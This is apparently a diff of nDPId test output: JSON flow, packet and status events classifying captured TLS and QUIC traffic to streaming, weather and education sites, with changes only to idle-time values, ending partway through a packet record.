-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637349011376,"flow_last_seen":1637349011396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1637349011396,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":263,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637349011376,"flow_last_seen":1637349011405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1637349011405,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1631088115362,"flow_last_seen":1631088168165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1637349011425,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637349011376,"flow_last_seen":1637349011376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1637349011376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1637349011376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TGJAAEAGkyTAqAGAj8wJQb8WAbs5hVBVAAAAAKAC+vA+\/wAAAgQFtAQCCAoHfmCrAAAAAAEDAww="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1637349011393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011393,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8T5MAAPMGHPOPzAlBwKgBgAG7vxa2dgKJOYVQVqASBZSQpgAAAgQFoAQCCArIQyJ4B35gqwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1637349011393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637349011393,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0TGNAAEAGkyvAqAGAj8wJQb8WAbs5hVBWtnYCioAQABDE0gAAAQEICgd+YL3IQyJ4"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637349011376,"flow_last_seen":1637349011396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1637349011396,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":263,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637349011376,"flow_last_seen":1637349011405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1637349011405,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1631088115362,"flow_last_seen":1631088168165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1637349011425,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":285,"packets-processed":284,"total-skipped-flows":0,"total-l4-data-len":121431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":8,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1642584017659} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642584017659,"flow_last_seen":1642584017659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642584017659,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1642584017659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017659,"pkt":"CL6sCxdumt9Y+uvcCABFAAA8EtFAAEAG2zrAqAypFwxoU5lQAbvzO0RFAAAAAKAC\/\/9KaQAAAgQFtAQCCApYVYYCAAAAAAEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1642584017680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017680,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAADcG9wsXDGhTwKgMqQG7mVB1nT8a8ztERqAS\/ojzIwAAAgQFtAQCCAqw3vMWWFWGAgEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1642584017681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642584017681,"pkt":"CL6sCxdumt9Y+uvcCABFAAA0EtJAAEAG20HAqAypFwxoU5lQAbvzO0RGdZ0\/G4AQAKwfuAAAAQEIClhVhhew3vMW"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642584017659,"flow_last_seen":1642584017683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642584017683,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":290,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642584017659,"flow_last_seen":1642584017706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1642584017706,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1637349011376,"flow_last_seen":1637349011425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":7767,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1642584019409,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642584017659,"flow_last_seen":1642584017659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642584017659,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1642584017659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017659,"pkt":"CL6sCxdumt9Y+uvcCABFAAA8EtFAAEAG2zrAqAypFwxoU5lQAbvzO0RFAAAAAKAC\/\/9KaQAAAgQFtAQCCApYVYYCAAAAAAEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1642584017680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017680,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAADcG9wsXDGhTwKgMqQG7mVB1nT8a8ztERqAS\/ojzIwAAAgQFtAQCCAqw3vMWWFWGAgEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1642584017681,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642584017681,"pkt":"CL6sCxdumt9Y+uvcCABFAAA0EtJAAEAG20HAqAypFwxoU5lQAbvzO0RGdZ0\/G4AQAKwfuAAAAQEIClhVhhew3vMW"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642584017659,"flow_last_seen":1642584017683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642584017683,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":290,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642584017659,"flow_last_seen":1642584017706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1642584017706,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1637349011376,"flow_last_seen":1637349011425,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":7767,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1642584019409,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":315,"packets-processed":314,"total-skipped-flows":0,"total-l4-data-len":128021,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":9,"total-updates":0,"current-active-flows":1,"total-active-flows":8,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":66,"global_ts_msec":1643355518166} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":180000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1643355518166,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"thread_ts_msec":1643355518166,"pkt":"pJGxgjQ5SKRyNpegCABFAAT+PElAAIARThnAqAF72DrRLubeAbsE6urRwAAAAAEIZ7HskbOWr9QAAETQNKtjIjiCXCI+9vqBWPy31G7jDH4RlwYv0XhaWuj0UrdcSVWZIrVwzwDrJa8dEWOeUvaAw7BXeYev6bi8Nu9Z4LWOvt0+XPgNkeHB6PvaZ9N4cpB1UIRx6byg5QljaxCkgdia5\/WZz2yX\/TayWJG0egLwFK4DYqDDADilA59ewmPTSu6+F3\/EVfKw86o2Yio5HeQqtUOtEdw6pRwxBehgjTrZf0PMuk40XDPug94YB\/sEApD8Ghq1zUUVofn\/jZoji68n+CZ74BkmZ8LSaemosx3Vm7YV3yQUauQU4lBHNM2XdkooJSDGv9YINXu8hmpHdW\/1encLGdPSyOJC8itWve1maDbUaMRhrbQrpaAPeVfgND5alDCN2DMGvFe3nB6Pz2LOpDsj\/3ZN3caT5Nt0nSv8HN+DYWZc+2JmBlBY71FJ57bmTqruFnoZ\/GjM0BGxB5WlpJ0M3zE3M16k0p8WRYGK3bOkXFB5rtEix709VUri+WnB1ivvzP4A8iO977JvKVGlPddOYZ4k7qZne6v\/jb1y0P5AatOM7YYIeRI7u8jf\/xM8RY8UTL\/Pv+EQzBcgac+DyXJSt\/sJo+Uuz0dGCYpa4Aa01DbWUiA5x+j4g5WT5LGdKrytMkGgkIcVSlNAt4nWOQc2IroqJjfmf+NbusGe\/Gviz5jV93bOaTFv7sGyuvESP0iH2MD2mwPgizF6t5EabtXWaevGbit0evQ9O3bHeRpQwTlwh0hRD7WqrIf0Wri9spAJN53856UKZFRupvrVqTH40ht5wGl2g3HXmJvEKnWBsD1hEB3sacVd4lWjKim62JMTY6yUmMhRBlNu2AupnyFsChUJ1NgsRbg5cQPowXRIBVG8WcjCs7OHKUH\/zza5xjXEz1FrdKQASDLCvFyh9YUzlRmDx7d99nX5vf9AwJejikY1uel\/yRMHcT9IqYO0kZBeGiX2ZDJD7vD1sF+05Qq++ztAL3CTqhuU\/7KSbWKiGOoFGj9phj6fZiE+g9e7+HIVuvPAKr+aSbxS71gHelt+hKMcDj7jdDFk5P6TqQdUXfqrnN38RDusNZmvWB+23Sj9NvIjlpua1MtXRWVJaLY5mX9AL1kTENCHtxomZwiXSqkSWtzS8dZocOlqjfWrd2hnw5yl8b7T0843OsmN6ZOoho4X9bhFw\/52C+NFDBAC42\/6jsH2i4NdbJBqOAuf4tLWi3oaJ\/0r5Y0wWyVnBbFtq1sx6d6EHxqir52O50dkkD8SF7j+wGSCG2L1l5bcQGnAqpzpZNB8AgofMTbrgYgdYIyrh\/neffOlCQyXy2EgLb\/xWEt+QftF8p5n2FzevDADqTCGGVeWULgrEsb\/3qULNf4uZHaY4HBD6To7yTuITvaXdqFt30MJBKnhBexi0dhA\/MGpMyVJfR\/PhbhWZmiNdx\/LRAV2Semg\/nPWe+DzSBBXm7wJXZiE\/8ewkRVdkujJi\/QhXAX0aOL76X77YYeny\/V35WiIqUmuxRHrBRdP5AMMQo\/adJoX4bzVdEvw3cGw7\/\/hO2VzwL5m0trABzWAWdjRjsrTEu\/mWAVCZDP5\/peoG8YXeXsdHWwpRLyNJpzOlRz5aND24Jgn5x2v3PqoD5RBiIEHwD8jlV2fRCZXq1e7tPV6eLhSI74="} 00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":180000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"},"quic": {"client_requested_server_name":"classroom.google.com","user_agent":"Chrome\/97.0.4692.99 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3","ja3":"a27a03a8478393fe7f8958648bb71ff4","tls_supported_versions":"TLSv1.3"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1642584017659,"flow_last_seen":1642584019409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6590,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1642584017659,"flow_last_seen":1642584019409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6590,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":316,"packets-processed":315,"total-skipped-flows":0,"total-l4-data-len":129271,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":9,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":1646482623895} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482623895,"flow_last_seen":1646482623895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482623895,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1646482623895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482623895,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8U5dAAEAGwa7AqAGAH95DcIjuAbuZU7+5AAAAAKAC+vB+rAAAAgQFtAQCCAqYsCyFAAAAAAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1646482623937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482623937,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADIGI04f3kNwwKgBgAG7iO5SHRbemVO\/uoASa9CRawAAAgQFUAEBBAIBAwMH"} -01155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1646482623941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482623941,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItU5lAAEAGv7vAqAGAH95DcIjuAbuZU7+6Uh0W31AYAfZFAQAAFgMBAgABAAH8AwM7S+zQhzGHYgeM16HLoV5Lvv0qFp3\/Q9lLhcf6NGzgACCV4MycI1TbPUTQp0gTtBJdGxhCWPX0NxBb4Keh1UEhIQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuYmFkb28uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIDy\/wV7uHvn89KVxoNawBj6O\/1N7J\/Rv6ROuT\/L2i752ABcAQQR8rtiFUa3yYRs4u6Ro\